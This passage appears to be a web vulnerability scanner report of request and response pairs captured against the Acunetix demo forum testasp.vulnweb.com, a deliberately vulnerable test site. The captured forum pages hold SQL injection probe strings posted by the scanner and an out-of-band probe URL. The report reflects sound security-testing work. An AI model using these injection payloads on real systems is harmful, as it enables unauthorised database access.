theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=76 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4165 |
Response Body - size: 4,165 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 2+813-813-1=0+0+0+1 or 'OI38CHHi'='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=77 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4165 |
Response Body - size: 4,165 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:16:54 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3+813-813-1=0+0+0+1 or 'OI38CHHi'='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=78 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4163 |
Response Body - size: 4,163 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:01 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2<(0+5+813-813) or 'OI38CHHi'='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=79 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:45 GMT Content-Length: 4163 |
Response Body - size: 4,163 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:01 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1' OR 3*2>(0+5+813-813) or 'OI38CHHi'='</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=8 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 344 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:40 GMT Content-Length: 4140 |
Response Body - size: 4,140 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:14:51 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>http://xfs.bxss.me</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=80 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 4153 |
Response Body - size: 4,153 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:02 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 2+332-332-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/showthread.asp?id=81 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 345 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 03:59:46 GMT Content-Length: 4153 |
Response Body - size: 4,153 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>XcwJRDFY</b> on 12/14/2022 3:17:05 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 104.156.249.56</div><div class='posttext'>-1" OR 3+332-332-1=0+0+0+1 -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" 